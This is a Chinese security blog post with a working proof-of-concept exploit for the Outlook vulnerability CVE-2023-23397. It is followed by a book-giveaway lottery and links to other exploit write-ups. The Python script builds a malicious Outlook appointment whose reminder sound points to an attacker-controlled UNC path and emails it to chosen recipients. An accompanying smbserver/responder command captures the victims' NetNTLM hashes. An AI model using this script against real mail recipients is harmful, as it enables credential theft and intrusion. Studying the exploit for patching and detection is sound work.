【漏洞速递 | 有彩蛋】CVE-2023-23397 漏洞 | 文末送书
2023-3-30 07:31:41 Author: 渗透Xiao白帽(查看原文) 阅读量:70 收藏

        制作了一个简单的 PoC 电子邮件生成器和发件人,具有恶意提醒功能(只是一条消息,无需使用任务或 Cal.Ev.)。

https://github.com/Trackflaw/CVE-2023-23397/blob/main/poc.gif

In one session :

python CVE-2023-23397.py
usage: CVE-2023-23397.py [-h] -p PATHCVE-2023-23397.py: error: the following arguments are required: -p/--path
python CVE-2023-23397.py --path '\\yourip\'

In a second session (smbserver or responder as you want).

smbserver.py -smb2support SHARE .

import smtplib, datetime, argparsefrom email.mime.multipart import MIMEMultipartfrom email.mime.text import MIMETextfrom email.mime.application import MIMEApplicationfrom email.utils import COMMASPACE, formatdatefrom independentsoft.msg import Message
# Mail configuration : change it !smtp_server = "mail.example.com"smtp_port = 587
sender_email = "[email protected]"sender_password = "[email protected]"
recipients_email = ["[email protected]"]
class Email: def __init__(self, smtp_server, port, username, password, recipient): self.smtp_server = smtp_server self.port = port self.username = username self.password = password self.recipient = recipient
def send(self, subject, body, attachment_path): msg = MIMEMultipart() msg['From'] = self.username msg['To'] = COMMASPACE.join(self.recipient) msg['Date'] = formatdate(localtime=True) msg['Subject'] = subject msg.attach(MIMEText(body))
with open(attachment_path, 'rb') as f: part = MIMEApplication(f.read(), Name=attachment_path) part['Content-Disposition'] = f'attachment; filename="{attachment_path}"' msg.attach(part)
try: server = smtplib.SMTP(self.smtp_server, self.port) server.starttls() server.login(self.username, self.password) server.sendmail(self.username, self.recipient, msg.as_string()) server.quit() print("[+] Malicious appointment sent !")

except Exception as e: print("[-] Error with SMTP server...", e)
parser = argparse.ArgumentParser(description='CVE-2023-23397 POC : send a malicious appointment to trigger NetNTLM authentication.')parser.add_argument('-p', '--path', type=str, help='Local path to process', required=True)args = parser.parse_args()
appointment = Message()appointment.message_class = "IPM.Appointment"appointment.subject = "CVE-2023-23397"appointment.body = "New meeting now !"appointment.location = "Paris"appointment.appointment_start_time = datetime.datetime.now()appointment.appointment_end_time = datetime.datetime.now()appointment.reminder_override_default = Trueappointment.reminder_sound_file = args.pathappointment.save("appointment.msg")
email = Email(smtp_server, smtp_port, sender_email, sender_password, recipients_email)
subject = "Hello There !"body = "Important appointment !"email.send(subject, body, "appointment.msg")

文章来源:Khan安全攻防实验室

【抽奖彩蛋】

参与规则如下:

①、把文章分享到朋友圈不分组(作为兑奖凭证)

②、点击下方名片发送「暗号」,即可参与抽奖(两本书籍二选一

③、 2023 年 4月 1 日 12:00 自动开奖

④、请中奖的同学在24小时内填写联系小编进行验证。超过24小时未联系的(中奖了但是未满足条件①的)均视为自动放弃!

《物联网安全漏洞挖掘实战》:本书源自作者多年在物联网安全领域中的经验积累,从实战的角度对物联网领域的漏洞挖掘技术进行了介绍,对物联网中存在的安全隐患进行了全面细致的剖析。

本书所选案例均来自真实的应用环境,实用性与可操作性强,更贴近物联网安全的研究与学习。对于物联网安全研究人员、固件应用开发人员以及对相关专业的学生来说,都可以通过本书对掌握物联网漏洞的挖掘与防范技能。

本书主要内容包括:物联网概述、物联网设备硬件分析、物联网固件分析、物联网漏洞利用、物联网协议安全。

链接地址:

https://item.m.jd.com/product/13616401.html

《物联网信息安全技术》:电信技术专家朱中梁院士作序推荐,电子科技大学(成都)张小松教授团队编写,从攻防角度系统介绍loT安全的相关知识、原理技术,并针对智能家居、智能汽车、智能穿戴设备等典型应用场景,分析其中存在的安全风险 。本书可作为计算机、网络通信、信息安全、软件工程等相关专业的参考用书,也可作为物联网及安全行业从业者、对信息安全感兴趣的读者的自学读物。 

【往期推荐】

【内网渗透】内网信息收集命令汇总

【内网渗透】域内信息收集命令汇总

【超详细 | Python】CS免杀-Shellcode Loader原理(python)

【超详细 | Python】CS免杀-分离+混淆免杀思路

【超详细 | 钟馗之眼】ZoomEye-python命令行的使用

【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现

【漏洞分析 | 附EXP】CVE-2021-21985 VMware vCenter Server 远程代码执行漏洞

【CNVD-2021-30167 | 附PoC】用友NC BeanShell远程代码执行漏洞复现

【奇淫巧技】如何成为一个合格的“FOFA”工程师

【超详细】Microsoft Exchange 远程代码执行漏洞复现【CVE-2020-17144】

【超详细】Fastjson1.2.24反序列化漏洞复现

  记一次HW实战笔记 | 艰难的提权爬坑

走过路过的大佬们留个关注再走呗

往期文章有彩蛋哦


一如既往的学习,一如既往的整理,一如即往的分享

仅用于学习交流,不得用于非法用途

如侵权请私聊公众号删文


文章来源: http://mp.weixin.qq.com/s?__biz=MzI1NTM4ODIxMw==&mid=2247497358&idx=1&sn=dfb29c644ac40ff9bb9bdfc8cf349a79&chksm=ea3409d4dd4380c20d9e785f5ea7538a8f51a0255d2ca0ce86f76ae0fc31e49e0278eecf8e47#rd
如有侵权请联系:admin#unsafe.sh